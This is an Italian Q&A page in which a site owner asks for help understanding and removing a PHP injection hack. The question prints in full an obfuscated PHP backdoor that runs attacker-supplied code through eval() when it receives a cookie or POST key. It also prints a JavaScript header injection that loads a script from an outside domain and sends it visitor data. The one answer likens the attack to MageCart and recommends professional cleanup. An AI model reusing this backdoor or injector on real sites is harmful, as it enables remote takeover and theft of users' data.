PHP Hack Injection - Aiuto per risolvere e capire [duplicare]

Question

PHP Hack Injection - Aiuto per risolvere e capire [duplicare]

#1 da (0 voti)

0

Recentemente siamo stati infettati da un hack PHP e speravo che voi poteste gettare qualche altra luce sull'argomento. Principalmente come funziona questo hack e come risolverlo?

Ci stiamo muovendo verso una nuova configurazione, che secondo il nostro ospite, è il modo migliore per rimediare a questo. Tuttavia, se possiamo rallentare o fermare gli hack durante lo spostamento, sarebbe molto meglio.

Gli hacker iniettano file legittimi nelle intestazioni e creano nuovi file PHP, che nella maggior parte dei casi contengono queste diverse righe di codice, che rendono le ricerche più facili da trovare.

$GLOBALS[$GLOBALS['

$payload = "file_put_contents

"base" . "64_decode"

Array('1'=>

= isset($

if (!defined('ALREADY_RUN

**The majority contain this code:**
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['s9b2'] = "\x76\x4f\x69\x63\x49\x6a\x66\x7c\x6c\x51\x3c\x4b\x2d\x20\x31\x29\x7b\x2c\x28\x46\x62\x52\x57\x42\x65\x45\x41\x59\x6f\x68\xa\x43\x9\x21\x3a\x61\x36\x77\x34\x7e\x7a\x5c\x2a\x3e\x71\x58\x6e\x32\x73\x27\x6b\x67\x5d\x78\x72\x44\x4a\x2e\x40\x5b\x37\x25\x38\x26\x5a\x50\x60\x3d\x3b\x56\x30\x4e\x3f\x70\x39\xd\x33\x53\x23\x2f\x22\x2b\x64\x79\x6d\x4d\x55\x7d\x5f\x75\x48\x54\x4c\x47\x35\x74\x5e\x24";
$GLOBALS[$GLOBALS['s9b2'][0].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][20]] = $GLOBALS['s9b2'][3].$GLOBALS['s9b2'][29].$GLOBALS['s9b2'][54];
$GLOBALS[$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][94]] = $GLOBALS['s9b2'][28].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][82];
$GLOBALS[$GLOBALS['s9b2'][73].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][3]] = $GLOBALS['s9b2'][48].$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][46];
$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][70]] = $GLOBALS['s9b2'][2].$GLOBALS['s9b2'][46].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][95];
$GLOBALS[$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][35]] = $GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][40].$GLOBALS['s9b2'][24];
$GLOBALS[$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][70]] = $GLOBALS['s9b2'][73].$GLOBALS['s9b2'][29].$GLOBALS['s9b2'][73].$GLOBALS['s9b2'][0].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][46];
$GLOBALS[$GLOBALS['s9b2'][84].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][35]] = $GLOBALS['s9b2'][89].$GLOBALS['s9b2'][46].$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][40].$GLOBALS['s9b2'][24];
$GLOBALS[$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][76]] = $GLOBALS['s9b2'][20].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][24];
$GLOBALS[$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][70]] = $GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][84].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][84].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][95];
$GLOBALS[$GLOBALS['s9b2'][83].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14]] = $GLOBALS['s9b2'][95].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][20];
$GLOBALS[$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][62].$GLOBALS['s9b2'][70]] = $GLOBALS['s9b2'][44].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][3];
$GLOBALS[$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][6]] = $_POST;
$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][36]] = $_COOKIE;
@$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][70]]($GLOBALS['s9b2'][24].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][51], NULL);
@$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][70]]($GLOBALS['s9b2'][8].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][51].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][48], 0);
@$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][70]]($GLOBALS['s9b2'][84].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][53].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][53].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][89].$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][46].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][84].$GLOBALS['s9b2'][24], 0);
@$GLOBALS[$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][70]](0);

$qcecc0e0f = NULL;
$ide605a9 = NULL;

$GLOBALS[$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][82]] = $GLOBALS['s9b2'][3].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][62].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][24];
global $s5cf5021d;

function qe9001c0c($qcecc0e0f, $v42282)
{
    $sbec70da = "";

    for ($s11c3d0e5=0; $s11c3d0e5<$GLOBALS[$GLOBALS['s9b2'][73].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][3]]($qcecc0e0f);)
    {
        for ($k310c1a=0; $k310c1a<$GLOBALS[$GLOBALS['s9b2'][73].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][3]]($v42282) && $s11c3d0e5<$GLOBALS[$GLOBALS['s9b2'][73].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][3]]($qcecc0e0f); $k310c1a++, $s11c3d0e5++)
        {
            $sbec70da .= $GLOBALS[$GLOBALS['s9b2'][0].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][20]]($GLOBALS[$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][94]]($qcecc0e0f[$s11c3d0e5]) ^ $GLOBALS[$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][94]]($v42282[$k310c1a]));
        }
    }

    return $sbec70da;
}

function t1db($qcecc0e0f, $v42282)
{
    global $s5cf5021d;

    return $GLOBALS[$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][62].$GLOBALS['s9b2'][70]]($GLOBALS[$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][62].$GLOBALS['s9b2'][70]]($qcecc0e0f, $s5cf5021d), $v42282);
}

foreach ($GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][36]] as $v42282=>$r26d29)
{
    $qcecc0e0f = $r26d29;
    $ide605a9 = $v42282;
}

if (!$qcecc0e0f)
{
    foreach ($GLOBALS[$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][6]] as $v42282=>$r26d29)
    {
        $qcecc0e0f = $r26d29;
        $ide605a9 = $v42282;
    }
}

$qcecc0e0f = @$GLOBALS[$GLOBALS['s9b2'][84].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][35]]($GLOBALS[$GLOBALS['s9b2'][83].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14]]($GLOBALS[$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][76]]($qcecc0e0f), $ide605a9));
if (isset($qcecc0e0f[$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][50]]) && $s5cf5021d==$qcecc0e0f[$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][50]])
{
    if ($qcecc0e0f[$GLOBALS['s9b2'][35]] == $GLOBALS['s9b2'][2])
    {
        $s11c3d0e5 = Array(
            $GLOBALS['s9b2'][73].$GLOBALS['s9b2'][0] => @$GLOBALS[$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][70]](),
            $GLOBALS['s9b2'][48].$GLOBALS['s9b2'][0] => $GLOBALS['s9b2'][14].$GLOBALS['s9b2'][57].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][14],
        );
        echo @$GLOBALS[$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][35]]($s11c3d0e5);
    }
    elseif ($qcecc0e0f[$GLOBALS['s9b2'][35]] == $GLOBALS['s9b2'][24])
    {
        eval($qcecc0e0f[$GLOBALS['s9b2'][82]]);
    }
    exit();
}

Nuovo esempio di intestazione infetto:

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://solventoffertes.be/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(do

Ci sono circa 4 diverse varianti, ma quella GLOBALS è la più comune.

Qualche idea su come risolvere questo problema e come funziona?

php system-compromise

posta Rico 14.12.2016 - 23:33

fonte

1 risposta

Leggi altre domande sui tag php system-compromise

Honeypot URL e sito di segnalazione Infezione di dispositivi sincronizzati attraverso il cloud

score 0 · Answer 1

Questo sembra essere simile all'hack di MageCart. Guarda gli esempi qui: link

In pratica, ciò che stanno facendo è rubare informazioni dagli utenti del tuo sito. Il fatto che stanno scrivendo nuovi file sul tuo sistema operativo è preoccupante. Devi lavorare con un professionista della sicurezza per ripulire il tuo sito. Ciò richiede la modifica di tutte le password precedenti, la ricerca e la rimozione di tutto il codice dannoso, la scoperta di come sono arrivati gli hacker, ecc ... Se si è più tecnici, è possibile trovare alcune best practice sulla sicurezza per l'applicazione installata sul sistema e per vedere il link Anders ti ha fornito nel commento per alcune informazioni più generali.